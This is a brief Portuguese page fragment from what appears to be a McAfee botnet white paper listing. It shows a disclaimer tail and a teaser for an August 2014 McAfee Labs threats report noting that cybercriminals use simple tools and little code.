fornecidos sem garantia de qualquer espécie, expressa ou implícita. 10204wp_botnets_0710_ETMG
Documentos relacionados
Relatório do McAfee Labs sobre ameaças Agosto de 2014
profissionais de segurança podem utilizar uma variedade de ferramentas comerciais, o mesmo vale para os cibercriminosos. Com ferramentas simples, algumas linhas de código e uns cafezinhos, é possív...
Leia mais